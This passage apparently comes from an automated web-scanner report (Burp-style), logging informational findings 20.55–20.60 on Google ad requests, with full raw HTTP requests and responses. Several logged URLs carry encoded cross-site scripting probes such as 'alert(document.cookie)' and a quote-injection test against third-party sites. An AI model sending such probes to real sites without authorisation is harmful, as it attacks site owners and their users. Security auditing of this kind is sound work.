<font style="line-height:8px; font-size:9px" face="arial,sans-serif" color="#ffffff"><a target="_blank" href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3DTVneto.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHktkcN_kAgpKjC7M0HmIZ5_427VA">Ads by Google</a>
...[SNIP]...

20.55. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5812731941170583&output=html&h=250&slotname=1941239499&w=300&lmt=1295935779&flash=10.1.103&url=http%3A%2F%2Fwww.soundingsonline.com%2F%3F1'%3D1&dt=1295922236612&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922236685&frm=0&adk=409666081&ga_vid=1723068183.1295922238&ga_sid=1295922238&ga_hid=386599552&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1139&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F59&fu=0&ifi=1&dtd=3003&xpc=TtWmgIhXxC&p=http%3A//www.soundingsonline.com
The response contains the following link to another domain:
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.soundingsonline.com/%253F1%2527%253D1%26hl%3Den%26client%3Dca-pub-5812731941170583%26adU%3DPhoenix.edu%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFIk5F3IGtYkLKikLy13yVNnljZZg

Request

GET /pagead/ads?client=ca-pub-5812731941170583&output=html&h=250&slotname=1941239499&w=300&lmt=1295935779&flash=10.1.103&url=http%3A%2F%2Fwww.soundingsonline.com%2F%3F1'%3D1&dt=1295922236612&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922236685&frm=0&adk=409666081&ga_vid=1723068183.1295922238&ga_sid=1295922238&ga_hid=386599552&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1139&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F59&fu=0&ifi=1&dtd=3003&xpc=TtWmgIhXxC&p=http%3A//www.soundingsonline.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 02:23:58 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 5409

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<font style="line-height:8px; font-size:9px" face="arial,sans-serif" color="#ffffff"><a target="_blank" href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.soundingsonline.com/%253F1%2527%253D1%26hl%3Den%26client%3Dca-pub-5812731941170583%26adU%3DPhoenix.edu%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFIk5F3IGtYkLKikLy13yVNnljZZg">Ads by Google</a>
...[SNIP]...

20.56. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
  • http://pagead2.googlesyndication.com/pagead/sma8.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.abbreviations.com/bs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E7a00ceef170%2526SE%253D3%2526r%253D1%26hl%3Den%26client%3Dca-pub-6071864913982699%26adU%3DPhoenix.edu%26adT%3DUniversity%2Bof%2BPhoenix%25C2%25AE%26adU%3DEventsManager.GFI.Com%26adT%3DGFI%2BEventsManager%25E2%2584%25A2%2B2010%26adU%3Dwww.Google.com/ig%26adT%3DOnline%2BThesaurus%26adU%3DYahoo.com%26adT%3DAbbreviations%26gl%3DUS&usg=AFQjCNGS5DKvtrnDzDUAr3_NuVakjNR9sQ

Request

GET /pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 21:08:38 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14615

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000055;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.abbreviations.com/bs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E7a00ceef170%2526SE%253D3%2526r%253D1%26hl%3Den%26client%3Dca-pub-6071864913982699%26adU%3DPhoenix.edu%26adT%3DUniversity%2Bof%2BPhoenix%25C2%25AE%26adU%3DEventsManager.GFI.Com%26adT%3DGFI%2BEventsManager%25E2%2584%25A2%2B2010%26adU%3Dwww.Google.com/ig%26adT%3DOnline%2BThesaurus%26adU%3DYahoo.com%26adT%3DAbbreviations%26gl%3DUS&amp;usg=AFQjCNGS5DKvtrnDzDUAr3_NuVakjNR9sQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.57. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898358&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&fu=0&ifi=1&dtd=89&xpc=tRJFI91Fl0&p=http%3A//linux.maruhn.com
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
  • http://pagead2.googlesyndication.com/pagead/sma8.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://linux.maruhn.com/sec/aub.html%26hl%3Den%26client%3Dca-pub-8731857490252326%26adU%3Dwww.Centrify.com/Linux%26adT%3DLinux%2BActive%2BDirectory%26adU%3Dftp.egnyte.com/Free_Trial%26adT%3DInstant%2BFTP%2BSite%26adU%3Dcncwindowandglass.com%26adT%3DC%2526amp%253BC%2BWindow,Glass%2B%2526amp%253BMirror%26gl%3DUS&usg=AFQjCNHdW_Jd5uLpURqGV9yPEl8pxGo3AQ

Request

GET /pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898358&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&fu=0&ifi=1&dtd=89&xpc=tRJFI91Fl0&p=http%3A//linux.maruhn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://linux.maruhn.com/sec/aub.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 14:54:23 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://linux.maruhn.com/sec/aub.html%26hl%3Den%26client%3Dca-pub-8731857490252326%26adU%3Dwww.Centrify.com/Linux%26adT%3DLinux%2BActive%2BDirectory%26adU%3Dftp.egnyte.com/Free_Trial%26adT%3DInstant%2BFTP%2BSite%26adU%3Dcncwindowandglass.com%26adT%3DC%2526amp%253BC%2BWindow,Glass%2B%2526amp%253BMirror%26gl%3DUS&amp;usg=AFQjCNHdW_Jd5uLpURqGV9yPEl8pxGo3AQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.58. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2719533347097950&output=html&h=90&slotname=0093365503&w=728&lmt=1295906621&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885021810&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6395072094&correlator=1295885021553&frm=0&adk=2318622855&ga_vid=1245853295.1295885022&ga_sid=1295885022&ga_hid=1952040595&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=33895220%2C86726840&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=2&dtd=14&gcv=gcm_66a225a4a9849ebff5b9f77536ce7311.js
The response contains the following link to another domain:
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dwww.ballerarcade.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNF3Mc_FOpmnu196_F7ihnQiTxqRcw

Request

GET /pagead/ads?client=ca-pub-2719533347097950&output=html&h=90&slotname=0093365503&w=728&lmt=1295906621&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885021810&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6395072094&correlator=1295885021553&frm=0&adk=2318622855&ga_vid=1245853295.1295885022&ga_sid=1295885022&ga_hid=1952040595&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=33895220%2C86726840&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=2&dtd=14&gcv=gcm_66a225a4a9849ebff5b9f77536ce7311.js HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(document.cookie)%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 21:59:52 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3932

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<font style="line-height:8px; font-size:9px" face="arial,sans-serif" color="#000000"><a target="_blank" href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dwww.ballerarcade.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNF3Mc_FOpmnu196_F7ihnQiTxqRcw">Ads by Google</a>
...[SNIP]...

20.59. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3737471162188127&output=html&h=600&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
  • http://pagead2.googlesyndication.com/pagead/sma8.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.beirut.com/css/blue/4429e%25252527%2525253balert%25252528document.cookie%25252529%2525252f%2525252f59f8c7185c5/search-btn.gif%26hl%3Den%26client%3Dca-pub-3737471162188127%26adU%3Dwww.Emirates.com/JetBlue%26adT%3DFly%2BEmirates%2B%2526amp%253B%2BJetBlue%26adU%3DEventsManager.GFI.Com%26adT%3DGFI%2BEventsManager%25E2%2584%25A2%2B2010%26adU%3Dwww.booking.com%26adT%3DHotels%2Bin%2BBeirut%26adU%3DGreatEyes.org%26adT%3DNashville%2BVision%2BCare%26adU%3Dwww.ArabLounge.com%26adT%3DLebanese%2BDating%2BSite%26gl%3DUS&usg=AFQjCNFeOfnvXzxGX6z6AyJJl1KudBTYcA

Request

GET /pagead/ads?client=ca-pub-3737471162188127&output=html&h=600&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a2bb8a70&zoneid=121960&target=_blank&cb=416587824
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 02:20:41 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14626

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.beirut.com/css/blue/4429e%25252527%2525253balert%25252528document.cookie%25252529%2525252f%2525252f59f8c7185c5/search-btn.gif%26hl%3Den%26client%3Dca-pub-3737471162188127%26adU%3Dwww.Emirates.com/JetBlue%26adT%3DFly%2BEmirates%2B%2526amp%253B%2BJetBlue%26adU%3DEventsManager.GFI.Com%26adT%3DGFI%2BEventsManager%25E2%2584%25A2%2B2010%26adU%3Dwww.booking.com%26adT%3DHotels%2Bin%2BBeirut%26adU%3DGreatEyes.org%26adT%3DNashville%2BVision%2BCare%26adU%3Dwww.ArabLounge.com%26adT%3DLebanese%2BDating%2BSite%26gl%3DUS&amp;usg=AFQjCNFeOfnvXzxGX6z6AyJJl1KudBTYcA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.60. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3737471162188127&output=html&h=600&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287
The response contains the following link to another domain:
  • http://ads.gmodules.com/gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F160x600.xml&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJUxlLD0-TYmZNJmSmgfe7tCWBra1nskBorr7ohHAjbcB8Ml0EAEYASChjJECOABQm9vQugFgyYajh9SjgBCgAcSR-u4DsgEOd3d3LmJlaXJ1dC5jb226AQoxNjB4NjAwX2FzyAEJ2gFwaHR0cDovL3d3dy5iZWlydXQuY29tL2Nzcy9ibHVlLzQ0MjllJTI1MjclMjUzYmFsZXJ0JTI1Mjhkb2N1bWVudC5jb29raWUlMjUyOSUyNTJmJTI1MmY1OWY4YzcxODVjNS9zZWFyY2gtYnRuLmdpZrgCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26num%3D1%26ggladgrp%3D1606490670571667390%26gglcreat%3D6191605240890117981%26sig%3DAGiWqtyQjTRM9BczgLcar8E6l2tKcvgahw%26client%3Dca-pub-3737471162188127%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBJUxlLD0-TYmZNJmSmgfe7tCWBra1nskBorr7ohHAjbcB8Ml0EAEYASChjJECOABQm9vQugFgyYajh9SjgBCgAcSR-u4DsgEOd3d3LmJlaXJ1dC5jb226AQoxNjB4NjAwX2FzyAEJ2gFwaHR0cDovL3d3dy5iZWlydXQuY29tL2Nzcy9ibHVlLzQ0MjllJTI1MjclMjUzYmFsZXJ0JTI1Mjhkb2N1bWVudC5jb29raWUlMjUyOSUyNTJmJTI1MmY1OWY4YzcxODVjNS9zZWFyY2gtYnRuLmdpZrgCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26sigh%3DMKF7h87fTQU%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=0&up_rawquery=reno%20hotels&up_city=Washington&up_region=US-DC&up_lat=38.90&up_long=-77.04

Request

GET /pagead/ads?client=ca-pub-3737471162188127&output=html&h=600&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a2bb8a70&zoneid=121960&target=_blank&cb=416587824
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 03:02:04 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 1743

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><!-- {-872895728} --><!-- {http://www.ljmsite.com/google/gadgetads/kayakhotel/160x600.xml} -->
